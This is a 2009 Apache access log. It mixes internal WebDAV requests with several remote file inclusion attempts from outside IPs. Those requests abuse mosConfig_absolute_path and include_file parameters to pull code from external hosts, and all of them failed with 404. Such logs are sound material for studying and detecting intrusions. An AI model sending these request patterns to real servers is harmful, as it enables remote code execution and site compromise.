172.16.1.79 - - [24/Jun/2009:08:13:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.180.169.16 - - [24/Jun/2009:08:13:29 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
66.180.169.16 - - [24/Jun/2009:08:13:29 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
66.180.169.16 - - [24/Jun/2009:08:13:30 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
123.242.165.138 - - [24/Jun/2009:08:13:33 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
172.16.1.168 - - [24/Jun/2009:08:14:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:14:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:14:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
91.121.156.60 - - [24/Jun/2009:08:14:19 -0400] "GET /logs/error_log.Q108040600/includes/include_once.php?include_file=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:14:22 -0400] "GET /includes/include_once.php?include_file=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.826"
